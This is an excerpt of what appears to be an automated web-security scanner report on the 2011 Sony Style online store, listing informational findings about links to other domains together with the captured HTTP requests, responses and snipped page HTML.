http://products.sel.sony.com/SEL/legal/privacy.html
http://syndication.intel.com/DistributeModule.aspx?id=3692&contentType=0
http://syndication.intel.com/DistributeModule.aspx?id=3695&contentType=0
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.sony.com/
http://www.sony.net/
http://www.sonycreativesoftware.com/
http://www.twitter.com/sonyoutletusa
http://www.youtube.com/user/sonyelectronics
https://forum.sel.sony.com/
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0
https://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash&promoid=BIOW

Request

GET /webapp/wcs/stores/servlet/SYCTOProcess?catalogId=10551&storeId=10151&langId=-1&LBomId=8198552921666304162&categoryId=8198552921644768017 HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=8198552921644780502
Cookie: TS5bbf46=7383fa3612712fc2ae9b8567010662f778ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f2909ab541389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb233202c9c4e5eb222f7b4e774115284b9b8efe5667a7cd; mbox=check#true#1305494503|session#1305494389047-605069#1305496303|PC#1305494389047-605069.17#1306704043; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_NB_SB_BP_Bundles%2526pidt%253D1%2526oid%253Dhttp%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/SYCTOProcess%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":2,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=%2bQPq5Txj0cSj2K9MPHgm6Rb8HNI%3d%0a%3b2011%2d05%2d15+17%3a20%3a03%2e73%5f1305494403722%2d66941%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPVRKIbqMMYxuD%0aoaA6bOthQ6slGtdA5zKliKbgbQb9Z5HHz%2fccln%2fsMfRWku9CoObHeEzUcYMu9buki6yfEb1E%2fw%3d%3d; WC_GENERIC_ACTIVITYDATA=[1077176697%3atrue%3afalse%3a0%3aS8M6cnqRHf96Dmh3XbrqfLKeUOs%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE

Response

HTTP/1.1 200 OK
ntCoent-Length: 249393
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:21:24 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 249393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<p>
<a class="recommended" id="rec1" target="3692" href="http://syndication.intel.com/DistributeModule.aspx?id=3692&contentType=0" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=3692&contentType=0','3692','resizable=1,scrollbars=0,width=360,height=220');win.focus();">Intel<sup>
...[SNIP]...
<p>
<a class="recommended" id="rec1" target="3695" href="http://syndication.intel.com/DistributeModule.aspx?id=3695&contentType=0" onclick="JavaScript:win=window.open('http://syndication.intel.com/DistributeModule.aspx?id=3695&contentType=0','3695','resizable=1,scrollbars=0,width=360,height=220');win.focus();">Intel<sup>
...[SNIP]...
<div id="get_flash_button">
<a href="https://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash&promoid=BIOW" target="_blank" class="btn get_flash">
Get Flash
</a>
...[SNIP]...
<p class="arrow_link">For service plan information on professional camcorders, please <a href="http://pro.sony.com/bbsc/ssr/product-SPSCAM10RSEW3/" target="_blank" alt="service plan information for professional camcorders">click here</a>, and for professional tape recorders <a href="http://pro.sony.com/bbsc/ssr/cat-videorecorders/cat-rechdv/product-SPSDVR10RSEW3/" target="_blank" alt="service plan information for professional tape recorders">click here</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast & Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.72. http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/SYOrderItemAddProxy

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderItemAddProxy?catalogId=10551&storeId=10151&langId=-1&partNumber=VPCSB11FXWVGPBPSC24%2fBUNDLE&orderId=.&quantity=1&URL=OrderItemDisplay%3forderId%3d.&mode=add

The response contains the following links to other domains:

http://ebookstore.sony.com/
http://esupport.sony.com/US/perl/contact-relation.pl?
http://esupport.sony.com/US/perl/index.pl
http://esupport.sony.com/US/perl/model-accessories.pl
http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT
http://nexus2.ensighten.com/sony/Bootstrap.js
http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/
http://pro.sony.com/bbsc/ssr/cat-videorecorders/cat-rechdv/product-SPSDVR10RSEW3/
http://pro.sony.com/bbsc/ssr/product-SPSCAM10RSEW3/
http://products.sel.sony.com/SEL/legal/privacy.html
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.sony.com/
http://www.sony.net/
http://www.sonycreativesoftware.com/
http://www.twitter.com/sonyoutletusa
http://www.youtube.com/user/sonyelectronics
https://forum.sel.sony.com/
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

Response

HTTP/1.1 200 OK
Cteonnt-Length: 105431
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 105431
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:21:13 GMT
Connection: close
Set-Cookie: WC_PERSISTENT=CBnCTN%2fk0tv7Wl90iwNcp5k87TM%3d%0a%3b2011%2d05%2d15+17%3a21%3a12%2e486%5f1305494403722%2d66941%5f10151%5f239700473%2c%2d1%2cUSD%5f10151; Expires=Fri, 11 Nov 2011 21:21:13 GMT; Path=/
Set-Cookie: WC_USERACTIVITY_239700472=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10151; Path=/
Set-Cookie: WC_USERACTIVITY_239700473=239700473%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fvzN%2fgvbF4ghNt8PgRSo%2b%2fNBSE9hpRmZaAnCWxRhvXnyiDgyG6f2JRy%2fQgFThm8VbLj%0apf57iOYY6h2A8sdaqv5FTXOiOIU42kXPZ%2fYZWH%2fwQEnvQPepS3%2fxt2yYHA%2f7TgndYr1UpWvZEg%3d%3d; Path=/
Set-Cookie: TS5bbf46=394e9935c8a4843c432fda4ab01398c678ed098d530cefc94dd0437160ac0ec518a9cd87529ede9fc63309c81389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70e5e49aff7d9564e1d; Path=/
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<p class="arrow_link">For service plan information on professional camcorders, please <a href="http://pro.sony.com/bbsc/ssr/product-SPSCAM10RSEW3/" target="_blank" alt="service plan information for professional camcorders">click here</a>, and for professional tape recorders <a href="http://pro.sony.com/bbsc/ssr/cat-videorecorders/cat-rechdv/product-SPSDVR10RSEW3/" target="_blank" alt="service plan information for professional tape recorders">click here</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/" target="_blank" id="proStoreGlobalFooterLink" rel="" class="directoryListingLink">Broadcast & Professional</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://www.sonycreativesoftware.com/" target="_blank" id="sonyCreativeGlobalFooterLink" rel="" class="directoryListingLink">Sony Creative Software</a>
...[SNIP]...
<div id="globalLogoCalloutSection" class="">
<a href="http://www.sony.net" id="ssFooterLogoSony" class="seoImage">SONY</a>
<a href="http://www.sony.com" id="seeHearShopLogo" class="seoImage">See. Hear. Play. Shop.</a>
...[SNIP]...
<li class="extraLinkListItem lastLinkItem"><a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_blank" id="" class="footerExtraLink">Privacy Policy/Your California Privacy Rights</a>
...[SNIP]...
<noscript><img src="https://sonysscom.112.2O7.net/b/ss/sonysscom/1/H.8--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

22.73. http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The page was loaded from a URL containing a query string:

http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551

The response contains the following links to other domains:

http://ebookstore.sony.com/
http://esupport.sony.com/US/perl/contact-relation.pl?
http://esupport.sony.com/US/perl/index.pl
http://esupport.sony.com/US/perl/model-accessories.pl
http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT
http://nexus2.ensighten.com/sony/Bootstrap.js
http://pro.sony.com/bbsc/ssr/cat-broadcastcameras/
http://products.sel.sony.com/SEL/legal/privacy.html
http://twitter.com/sonyoutletusa
http://us.playstation.com/psn/
http://www.facebook.com/sonyelectronics
http://www.flickr.com/groups/sonycameraclub
http://www.flickr.com/groups/sonycameraclub/
http://www.sony.com/
http://www.sony.net/
http://www.sonycreativesoftware.com/
http://www.twitter.com/sonyoutletusa
http://www.youtube.com/user/sonyelectronics
https://forum.sel.sony.com/
https://productregistration.sel.sony.com/app/home.htm
https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp
https://sonysscom.112.2o7.net/b/ss/sonysscom/1/H.8--NS/0

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TS5bbf46=3693d43bbe004895fd54beab20d17b2d78ed098d530cefc94dd04371

Response

HTTP/1.1 200 OK
ntCoent-Length: 91771
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 91771
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:19:46 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Sales Support" href="http://esupport.sony.com/US/perl/model-accessories.pl" target="_blank">Contact Sales Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Support Forums" href="https://forum.sel.sony.com/" target="_blank">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Online Product Support" href="http://esupport.sony.com/US/perl/index.pl" target="_blank">Online Product Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Technical Support" href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank">Contact Technical Support</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Support: Product Registration" href="https://productregistration.sel.sony.com/app/home.htm" target="_blank">Product Registration</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/contact-relation.pl?" target="_blank" id="customerSupportGlobalFooterLink" rel="" class="directoryListingLink">Sales Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://forum.sel.sony.com/" id="backstagePCServicesGlobalFooterLink" rel="" class="directoryListingLink" target="_blank">Support Forums</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/select-system.pl?DIRECTOR=CONTACT" target="_blank" id="customerCareGlobalFooterLink" rel="" class="directoryListingLink">Technical Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="http://esupport.sony.com/US/perl/index.pl" target="_blank" id="globalProductSupportGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Online Product Support</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" id="partsServicesGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Replacement Parts</a>
...[SNIP]...
<li id="" class="footerDirectoryListItem"><a href="https://productregistration.sel.sony.com/app/home.htm" id="productRegistrationGlobalFooterLink" target="_blank" rel="" class="directoryListingLink">Product Registration</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
